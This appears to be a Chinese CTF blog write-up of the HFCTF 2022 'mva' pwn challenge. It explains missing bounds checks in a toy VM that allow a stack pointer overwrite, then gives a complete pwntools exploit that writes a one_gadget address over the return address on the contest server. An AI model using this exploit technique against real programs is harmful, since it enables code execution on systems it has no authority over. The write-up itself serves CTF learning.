前言：

昨天刚结束的虎符CTF的一道题，开始的太晚了，比赛结束半个小时才做出来，略显可惜

逆向分析：

拿到程序，稍做处理后可以看到，首先是让我们输入一段0x100的字节，然后开始取指-执行-取指-执行的过程，实现了一个小型的计算系统

然后我们简单的进行一些重命名，识别出一些结构来：
如push和pop:

设置寄存器的值

以及一些加减乘除和寄存器赋值等操作就不一一放截图了

漏洞

我们熟知VM的题漏洞基本都是边界检测的问题，sp的检测啊，寄存器指针的检测啊等等，本题也不例外

首先发现的是这两个地方：

case 0xD 功能中没有对SBYTE1进行任何检测，而v7又在栈上，所以可以进行一个栈上0x100范围内的任意地址读双字节，所以首先我们可以利用这个漏洞将栈上的一个libc中的地址读到寄存器中，一共有五个寄存器，在这一步用掉三个

将libc上地址写到寄存器里之后，再利用寄存器的加减法功能将其修正为onegadget

然后是case 0xE 功能中对SBYTE1没有进行负检测，导致可以利用这个漏洞修改reg到reg-0x100范围内的数据，到这里，我们再来看看栈结构是什么

可以发现，reg上面是sp指针，所以我们可以直接修改sp指针。接下来再来看它的栈检测做的是否完美：

这是push指令，可以看到它并没有对sp指针进行负检测，虽然在pop指令中有负检测，但是当我们可以直接修改sp指针的时候，这些检测就不够严格了。通过前面的漏洞修改sp为0x8000010c，这里注意，stack是一个双字节数组，可以看一下汇编代码：

这里有一个rax2,所以说当我们sp为0x8000010c的时候，可以通过sp不能大于0x100的检测，而在真正赋值的时候，0x8000010c2又会发生溢出，最后变成0x218,而stack+0x218正是程序的返回地址，所以当我们修改好sp指针后，直接将三个寄存器中存储的六个字节数据按照顺序执行push，就将onegadget写到了返回地址上。

exp:

from pwn import *
from ctypes import *
from base64 import *
#context.log_level = 'debug'
context.arch='amd64'
#io = process('./pwn')
io = remote('119.23.155.14',24018)
libc = ELF('./libc-2.31.so')
elf=ELF('./pwn')
#io = process(["./pwn"],env={"LD_PRELOAD":"./libc-2.27.so"})
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
#gdb.attach(io,'b*0x45d5c0\nb*0x488FE4')
def push():return p8(9)+p8(0)*3
def pop():return p8(0xa)+p8(0)*3
def show():return p8(0xf)*4
def add(dest,src1,src2):return p8(2)+p8(dest)+p8(src1)+p8(src2)
def set(index,num):return p8(1)+p8(index)+p8(num>>8)+p8(num&0xff)
def sub(dest,src1,src2):return p8(3)+p8(dest)+p8(src1)+p8(src2)
code=''
code+=set(0,1)
code+=p8(0xd)+p8(1)+p8(0x1e)+p8(0)
code+=set(0,1)
code+=p8(0xd)+p8(2)+p8(0x1f)+p8(0)
code+=set(0,1)
code+=p8(0xd)+p8(3)+p8(0x20)+p8(0)
code+=set(0,20)
code+=sub(2,2,0)
code+=set(0,4425)
code+=add(1,1,0)
code+=set(0,0x8000)
code+=set(4,0x010c)
code+=p8(0xe)+p8(0)+p8(0xff-6)+p8(0)
code+=p8(0xe)+p8(4)+p8(0xff-9)+p8(0)
code+=p8(0xe)+p8(1)+p8(0)+p8(0)
code+=push()
code+=p8(0xe)+p8(2)+p8(0)+p8(0)
code+=push()
code+=p8(0xe)+p8(3)+p8(0)+p8(0)
code+=push()
code+=p64(0)
sa("input your code now :\n",code.ljust(0x100,'\x00'))
ru("MVA is starting ...")
irt()

最后放一个打通的截图吧

虎符CTF 2022 mva相关推荐

赛宁网安-r3kapig联合战队冲击DEF CON CTF 2022总决赛
1993年,DEF CON黑客大会正式创办,第一届DEF CON CTF则始于1996年,是全球同类赛事中最具影响力的赛事之一,在圈内有着"黑客世界杯"的美誉. DEF CON C ...
Newstar Ctf 2022| week2 wp
Newstar Ctf 2022| week2 wp Newstar Ctf 2022第二周题目的wp. 文章目录 Newstar Ctf 2022| week2 wp Crypto unusual_ ...
Real World CTF 2022（体验赛）部分WP
文章目录 Real World CTF 2022(体验赛) Digital Souvenir log4flag Be-a-Database-Hacker the Secrets of Memory b ...
[CTF]2022美团CTF WEB WP
最终排名 easypickle 源码 import base64 import pickle from flask import Flask, session import os import ran ...
[Jule CTF 2022] 部分WP
这个比赛参加的人极少,比赛有一星期那么长,快结束的时候来了个大牛,一下上到12000+,我这6K只能排到第二了.不过题还是挺不错的.只是入口不是人链接,得自己输才能进,可能很多人因为这个没参加. Cr ...
[SECCON CTF 2022] 只两个小题pwn_koncha,rev_babycmp,crypto_pqpq
从一开始入门CTF,SECCON的名字就如雷贯耳,如今参加了又很失望,距离参加这种比赛还是太远了.只是作了两个100人以上作出来的小题. pwn koncha int __cdecl main(int ...
[Hack The Boo CTF 2022] writeup
一个外国简单比赛,好多人队都答了25题,由于web不会,misc不熟,作了misc3,crypto4,pwn5,rev5不过有的找不到了,慢慢找. misc Wrong Spooky Season 附 ...
[BDSec CTF 2022] 部分WP
组队参加了个国外的小线上赛,题目比较简单目录 PWN pwnrace Reverse BDSec License Checker 0x1 shashdot Flag Box Simple Math ...
[GDG CTF 2022] 几个小题，等WP
pwn-counter 作出来的基本都是入门题,这题给了源码,有3个功能1是counter++,2是counter--,但到1就不再减,3是给flag但要求counter==0.由于counter是字 ...

虎符CTF 2022 mva

前言：

逆向分析：

漏洞

虎符CTF 2022 mva相关推荐

最新文章

热门文章